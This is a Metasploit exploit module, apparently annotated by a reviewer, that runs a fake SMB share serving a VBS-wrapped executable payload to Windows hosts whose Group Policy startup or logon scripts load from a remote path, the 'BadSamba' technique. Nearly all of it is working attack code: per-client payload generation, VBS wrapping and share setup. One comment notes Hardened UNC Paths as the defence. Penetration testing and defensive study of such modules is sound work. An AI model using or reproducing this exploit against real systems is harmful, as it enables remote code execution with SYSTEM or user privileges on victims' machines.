##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
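# Fake SMB share that serves a VBS-wrapped payload to Windows hosts whose Group
# Policy startup/logon scripts point at a remote UNC path (the "BadSamba"
# technique). The module only runs the share: getting the victim to resolve
# the script location to this host (name/traffic redirection) is left to the
# operator, as the Description states.
#
# NOTE(review): defensively this is the attack class that Group Policy
# "Hardened UNC Paths" (mutual authentication / integrity for SYSVOL and
# NETLOGON) is meant to block — confirm against current Microsoft guidance.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Server::Share

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Group Policy Script Execution From Shared Resource',
        'Description' => %q{
          This is a general-purpose module for exploiting systems with Windows Group Policy
          configured to load VBS startup/logon scripts from remote locations. This module runs
          a SMB shared resource that will provide a payload through a VBS file. Startup scripts
          will be executed with SYSTEM privileges, while logon scripts will be executed with the
          user privileges. Have into account which the attacker still needs to redirect the
          target traffic to the fake SMB share to exploit it successfully. Please note in some
          cases, it will take 5 to 10 minutes to receive a session.
        },
        'Author' => [
          'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba
          'juan vazquez' # msf module
        ],
        'References' => [
          ['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],
          ['URL', 'https://github.com/GDSSecurity/BadSamba']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        # Declared unprivileged even though the Description says startup
        # scripts run as SYSTEM — presumably the conservative choice, since the
        # logon-script path runs as the logging-on user.
        'Privileged' => false,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Payload' => {
          'Space' => 2048,
          'DisableNops' => true
        },
        'Targets' => [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-01-26',
        'Notes' => {
          'AKA' => ['badsamba'],
          'Stability' => UNKNOWN_STABILITY,
          'Reliability' => UNKNOWN_RELIABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])
      ]
    )

    # The served file body is generated per connecting client in
    # on_client_connect, so the operator-settable FILE_CONTENTS option
    # (presumably registered by the Share mixin) is removed to avoid confusion.
    deregister_options('FILE_CONTENTS')
  end

  # Chooses the shared file name (FILE_NAME, or a random 4-6 letter *.vbs),
  # resets the per-client payload cache and prints the UNC path being served.
  def setup
    super
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
    @custom_payloads = {}
    print_status("File available on #{unc}...")
  end

  # Generates the VBS-wrapped executable for a connecting client once and
  # caches it under that client.
  #
  # Fix: the original tested `@custom_payloads[:client]` — the literal symbol,
  # which is never written — so the cache never hit and the payload was
  # regenerated on every connection. The lookup now uses the client itself,
  # matching the key used on the write side and in get_file_contents.
  def on_client_connect(client)
    super(client)

    return if @custom_payloads.key?(client)

    p = regenerate_payload(client)
    # NOTE(review): other server mixins document regenerate_payload returning
    # nil on failure — confirm for SMB::Server. When that happens the client
    # falls through to the mixin's default file contents in get_file_contents.
    return if p.nil?

    @custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(p.encoded_exe)
  end

  # Returns the VBS payload cached for this client, or the mixin's default
  # file contents when none was generated for it.
  def get_file_contents(client:)
    @custom_payloads[client] || super(client: client)
  end
end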